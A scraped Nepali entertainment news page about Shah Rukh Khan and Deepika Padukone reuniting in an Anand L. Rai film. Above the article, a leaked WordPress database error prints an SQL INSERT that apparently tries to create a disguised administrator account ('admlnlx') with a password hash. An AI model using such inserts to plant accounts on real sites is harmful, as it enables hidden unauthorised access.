WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcKxWpw2hCrjkiUuHqjil3EBTu5zau1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 11:32:14', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ५ –
बलिउडमा नायक साहरुख खान र नायिका काजोलको जोडी सबैभन्दा सफल मानिन्छ । तर, साहरुखको जोडी पछिल्ला केहि बर्षयता नायिका दीपिका पादुकोणसँग पनि सफल मानिएको छ । ‘ओम शान्ती ओम, चेन्नई एक्सप्रेस र ह्याप्पी न्यू इयर’ जस्ता चलचित्रमा साहरुख र दीपिका एकसाथ देखिए । यी तिनै चलचित्रले बक्स अफिसमा धमाल मच्चाए ।
त्यसपछि, साहरुख र दीपिकाका केहि चलचित्र रिलिज भए र सफल भए । तर, यो जोडी एकसाथ देखिएन । तर, अब निर्देशक आनन्द एल राइले साहरुख र दीपिकाको सफल जोडीलाई पर्दामा एकसाथ ल्याउने तयारी थालेका छन् ।
आनन्द साहरुखलाई लिएर एक चलचित्र बनाउँदैछन् । जुन, चलचित्रमा साहरुख होचो मानिसको भूमिकामा देखिदैछन् । यो चलचित्रका लागि नायिका को हुने भन्ने बिषयमा लामो समयदेखि मिडियाका खबर बाझिएका थिए । अब, भने नायिका दीपिका पादुकोणलाई फाइनल गरिएको चर्चा सुरु भएको छ ।
दीपिकाले चलचित्रका लागि स्त्रिmन टेष्ट समेत गरेकी छिन् । हलिउड यात्रामा लागेकी दीपिका अब फेरि बलिउडमै धमाल मच्चाउने सोचमा छिन् । यो चलचित्र सन् २०१८ को क्रिसमसमा रिलिज हुनेछ ।